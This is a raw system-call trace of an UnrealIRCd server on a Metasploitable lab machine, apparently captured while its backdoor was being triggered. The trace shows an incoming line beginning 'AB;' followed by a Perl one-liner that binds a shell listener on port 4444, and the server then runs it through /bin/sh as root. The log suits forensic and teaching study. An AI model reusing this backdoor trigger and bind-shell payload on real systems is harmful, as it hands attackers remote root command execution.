4519  07:30:57.336345 select(1024, [2 3 4 7 9], [], NULL, {0, 620000}) = 1 (in [2], left {0, 410000})

4519  07:30:57.546744 clock_gettime(CLOCK_MONOTONIC, {2267, 363782074}) = 0

4519  07:30:57.546783 time(NULL)        = 1495625457

4519  07:30:57.546810 time(NULL)        = 1495625457

4519  07:30:57.546838 gettimeofday({1495625457, 546842}, NULL) = 0

4519  07:30:57.546850 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:30:57.546889 clock_gettime(CLOCK_MONOTONIC, {2267, 363901905}) = 0

4519  07:30:57.546899 gettimeofday({1495625457, 546902}, NULL) = 0

4519  07:30:57.546909 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:30:57.546947 clock_gettime(CLOCK_MONOTONIC, {2267, 363959748}) = 0

4519  07:30:57.546958 accept(2, 0, NULL) = 5

4519  07:30:57.546976 getpeername(5, {sa_family=AF_INET, sin_port=htons(46029), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:30:57.547006 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:30:57.547019 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:30:57.547031 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:30:57.547043 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:30:57.547054 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:30:57.547065 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:30:57.547178 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:30:57.547311 clock_gettime(CLOCK_MONOTONIC, {2267, 364325755}) = 0

4519  07:30:57.547324 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:30:57.547337 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:30:57.547347 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:30:57.547369 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:30:57.547379 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:30:57.547394 send(6, "B\311\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:30:57.547471 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:30:57.547528 gettimeofday({1495625457, 547546}, NULL) = 0

4519  07:30:57.547553 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:30:57.552000 clock_gettime(CLOCK_MONOTONIC, {2267, 369016203}) = 0

4519  07:30:57.552016 recvfrom(6, "B\311\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0p\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:30:57.552086 close(6)          = 0

4519  07:30:57.552101 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:30:57.552114 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:30:57.552184 time(NULL)        = 1495625457

4519  07:30:57.552196 time(NULL)        = 1495625457

4519  07:30:57.552207 gettimeofday({1495625457, 552230}, NULL) = 0

4519  07:30:57.552254 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:30:57.552282 clock_gettime(CLOCK_MONOTONIC, {2267, 369294868}) = 0

4519  07:30:57.552292 gettimeofday({1495625457, 552295}, NULL) = 0

4519  07:30:57.552302 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 980000})

4519  07:30:57.563956 clock_gettime(CLOCK_MONOTONIC, {2267, 380974872}) = 0

4519  07:30:57.563975 recv(9, "PRIVMSG  #testit3 ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 45

4519  07:30:57.563998 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564017 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564032 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564046 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564060 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564083 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564097 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564110 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564124 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564138 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564151 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564165 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564178 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564192 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564205 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564219 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564232 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564246 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564260 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564274 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564287 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564301 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 390000}, ...}) = 0

4519  07:30:57.564317 gettimeofday({1495625457, 564321}, NULL) = 0

4519  07:30:57.564329 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:30:57.564409 clock_gettime(CLOCK_MONOTONIC, {2267, 381436823}) = 0

4519  07:30:57.564436 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:30:57.564465 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:30:57.564485 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:30:57.564497 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:30:57.564512 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10017

10017 07:30:57.564580 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10017 07:30:57.564594 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10017 07:30:57.564604 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10017 07:30:57.564617 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10017 07:30:57.564725 brk(0)            = 0x80f9000

10017 07:30:57.564747 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10017 07:30:57.564763 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f16000

10017 07:30:57.564779 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10017 07:30:57.564796 open("/etc/ld.so.cache", O_RDONLY) = 1

10017 07:30:57.564809 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10017 07:30:57.564828 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f0e000

10017 07:30:57.564929 close(1)          = 0

10017 07:30:57.564940 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10017 07:30:57.564956 open("/lib/libncurses.so.5", O_RDONLY) = 1

10017 07:30:57.564969 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10017 07:30:57.565068 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10017 07:30:57.565086 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ede000

10017 07:30:57.565098 mmap2(0xb7f0b000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f0b000

10017 07:30:57.565115 close(1)          = 0

10017 07:30:57.565127 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10017 07:30:57.565140 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10017 07:30:57.565155 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10017 07:30:57.565245 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10017 07:30:57.565262 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eda000

10017 07:30:57.565273 mmap2(0xb7edc000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7edc000

10017 07:30:57.565288 close(1)          = 0

10017 07:30:57.565299 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10017 07:30:57.565313 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10017 07:30:57.565326 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10017 07:30:57.565429 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10017 07:30:57.565446 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ed9000

10017 07:30:57.565460 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d8a000

10017 07:30:57.565471 mmap2(0xb7ed3000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ed3000

10017 07:30:57.565486 mmap2(0xb7ed6000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ed6000

10017 07:30:57.565500 close(1)          = 0

10017 07:30:57.565522 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d89000

10017 07:30:57.565534 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d896b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10017 07:30:57.565590 mprotect(0xb7ed3000, 4096, PROT_READ) = 0

10017 07:30:57.565626 munmap(0xb7f0e000, 29913) = 0

10017 07:30:57.565653 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10017 07:30:57.565666 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10017 07:30:57.565686 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf966b20) = -1 ENOTTY (Inappropriate ioctl for device)

10017 07:30:57.565717 brk(0)            = 0x80f9000

10017 07:30:57.565726 brk(0x80fa000)    = 0x80fa000

10017 07:30:57.565738 brk(0x80fb000)    = 0x80fb000

10017 07:30:57.565754 getuid32()        = 0

10017 07:30:57.565763 getgid32()        = 0

10017 07:30:57.565772 geteuid32()       = 0

10017 07:30:57.565781 getegid32()       = 0

10017 07:30:57.565795 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10017 07:30:57.565809 time(NULL)        = 1495625457

10017 07:30:57.565821 brk(0x80fc000)    = 0x80fc000

10017 07:30:57.565835 brk(0x80fd000)    = 0x80fd000

10017 07:30:57.565854 open("/proc/meminfo", O_RDONLY) = 1

10017 07:30:57.565876 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10017 07:30:57.565894 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f15000

10017 07:30:57.565916 read(1, "MemTotal:      1035240 kB\nMemFree:        436348 kB\nBuffers:         75128 kB\nCached:         364904 kB\nSwapCached:          0 kB\nActive:         256144 kB\nInactive:       312852 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        436108 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4156 kB\nWriteback:           0 kB\nAnonPages:      128964 kB\nMapped:          52008 kB\nSlab:            18840 kB\nSReclaimable:    10308 kB\nSUnreclaim:       8532 kB\nPageTables:       1960 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10017 07:30:57.566049 close(1)          = 0

10017 07:30:57.566060 munmap(0xb7f15000, 4096) = 0

10017 07:30:57.566072 brk(0x80fe000)    = 0x80fe000

10017 07:30:57.566098 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10017 07:30:57.566111 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10017 07:30:57.566123 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10017 07:30:57.566135 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10017 07:30:57.566147 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10017 07:30:57.566159 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10017 07:30:57.566172 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10017 07:30:57.566184 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10017 07:30:57.566197 uname({sys="Linux", node="metasploitable", ...}) = 0

10017 07:30:57.566296 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10017 07:30:57.566328 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10017 07:30:57.566362 brk(0x8100000)    = 0x8100000

10017 07:30:57.566373 getcwd("/etc/unreal", 4096) = 12

10017 07:30:57.566449 getpid()          = 10017

10017 07:30:57.566501 getppid()         = 4519

10017 07:30:57.566533 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10017 07:30:57.566578 stat64("/sbin/sh", 0xbf966af8) = -1 ENOENT (No such file or directory)

10017 07:30:57.566604 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10017 07:30:57.566657 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10017 07:30:57.566711 socket(PF_FILE, SOCK_STREAM, 0) = 1

10017 07:30:57.566744 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10017 07:30:57.566770 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10017 07:30:57.566791 close(1)          = 0

10017 07:30:57.566803 socket(PF_FILE, SOCK_STREAM, 0) = 1

10017 07:30:57.566813 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10017 07:30:57.566822 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10017 07:30:57.566840 close(1)          = 0

10017 07:30:57.566853 open("/etc/nsswitch.conf", O_RDONLY) = 1

10017 07:30:57.566867 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10017 07:30:57.566883 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f15000

10017 07:30:57.566894 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10017 07:30:57.567021 read(1, "", 4096) = 0

10017 07:30:57.567032 close(1)          = 0

10017 07:30:57.567041 munmap(0xb7f15000, 4096) = 0

10017 07:30:57.567057 open("/etc/ld.so.cache", O_RDONLY) = 1

10017 07:30:57.567069 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10017 07:30:57.567085 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f0e000

10017 07:30:57.567095 close(1)          = 0

10017 07:30:57.567105 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10017 07:30:57.567119 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10017 07:30:57.567133 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10017 07:30:57.567219 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10017 07:30:57.567236 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d80000

10017 07:30:57.567247 mmap2(0xb7d87000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d87000

10017 07:30:57.567267 close(1)          = 0

10017 07:30:57.567278 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10017 07:30:57.567291 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10017 07:30:57.567304 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10017 07:30:57.567389 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

